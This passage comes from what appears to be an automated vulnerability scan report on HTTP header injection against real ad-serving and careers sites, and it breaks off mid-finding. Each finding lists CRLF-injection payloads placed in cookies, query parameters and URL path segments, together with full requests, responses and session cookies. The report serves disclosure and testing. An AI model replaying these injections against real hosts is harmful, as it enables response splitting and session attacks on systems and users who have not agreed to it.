HTTP/1.1 302 Object moved Connection: close Date: Sat, 13 Nov 2010 01:59:50 GMT Server: Microsoft-IIS/6.0 P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Content-type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Cache-Control: no-cache, no-store Pragma: no-cache Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHH0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAPcPcrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C_ff8ba 362c533d84b=4005086 Location: http://ds.serving-sys.com/BurstingRes/Site-2452/Type-0/10e11342-71de-4dd2-be15-f354433bed69.gif Content-Length: 0
2.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/BannerSource.asp
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 38356%0d%0a8ef6af01349 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=038356%0d%0a8ef6af01349; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=038356 8ef6af01349; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C_=BlankImage Connection: close
2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/BurstingInteractionsPipe.asp
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 37f1a%0d%0a2300f10199f was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=037f1a%0d%0a2300f10199f; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=037f1a 2300f10199f; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Connection: close
2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/BurstingInteractionsPipe.asp
Issue detail
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3308a%0d%0ab7fc8e58424 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=3308a%0d%0ab7fc8e58424&wmpv=0&res=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=3308a b7fc8e58424&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Connection: close
2.8. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/BurstingInteractionsPipe.asp
Issue detail
The value of the res request parameter is copied into the Set-Cookie response header. The payload 1c571%0d%0ac124ed287af was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=10.1102&wmpv=0&res=1c571%0d%0ac124ed287af HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=1c571 c124ed287af&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Connection: close
2.9. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/BurstingInteractionsPipe.asp
Issue detail
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 637d4%0d%0a49ae547a880 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=10.1102&wmpv=637d4%0d%0a49ae547a880&res=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=637d4 49ae547a880; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Connection: close
2.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/adServer.bs
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload a3baa%0d%0aa106309a0a3 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0a3baa%0d%0aa106309a0a3; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Connection: close Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0a3baa a106309a0a3; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Vary: Accept-Encoding Content-Length: 1912
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]...
2.11. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: https://careers.nytco.com
Path: /psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload a8150%0d%0a9885d629a2a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /psc/TAM/a8150%0d%0a9885d629a2a/HRMS/c/HRS_HRAM.HRS_CE.GBL HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: careers.nytco.com Connection: Keep-Alive Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 13 Nov 2010 02:06:00 GMT Location: https://careers.nytco.com/psc/TAM/a8150 9885d629a2a/HRMS/c/HRS_HRAM.HRS_CE.GBL?& Content-Type: text/html Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyLwp6fh267CFb37d08fd519kxhjTgz!-9483320; path=/ Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=ibZNGO816CGmgoP+8wRDiOW9hzIWf9juKF29s4WauEjAoyGVrp0LscD5ghKu0DQKX6pY+xhT8lIghvjTkc++8/M/VES3ZdaLrnNm7pq0h2Vz3ljuB7NHtI5DQwSnEDUMyZwu4GybmH6PsHDSitdqiiEvb71ZKVC0; path=/ Content-Length: 365
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://careers.nytco.com/psc/TAM/ ...[SNIP]...
2.12. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: https://careers.nytco.com
Path: /psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 7fc66%0d%0a8dd5b3d6a61 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /psc/TAM/EMPLOYEE/7fc66%0d%0a8dd5b3d6a61/c/HRS_HRAM.HRS_CE.GBL HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: careers.nytco.com Connection: Keep-Alive Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 13 Nov 2010 02:06:01 GMT Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/7fc66 8dd5b3d6a61/c/HRS_HRAM.HRS_CE.GBL?& Content-Type: text/html Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJzJTQg31ZypJwG88s70yLh2LJnTcg!-9483320; path=/ Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=pv96knwIQLv8M6q+0wxVNoOH8UELVDAjmi5lOFUVLvLHLUcMZEE4VI+/2ppEGLojoOblLO2MXE0zbBLPh4G9gikNQpZ1CNnvWvuuqEYaNeD+zsteWFi355m2PmuxZ9pj++X8MGRqkm2QgXCsJaP58kYmNVL+5vSy; path=/ Content-Length: 373
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://careers.nytco.com/psc/TAM/ ...[SNIP]...
2.13. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: https://careers.nytco.com
Path: /psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 122a5%0d%0af997558f359 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
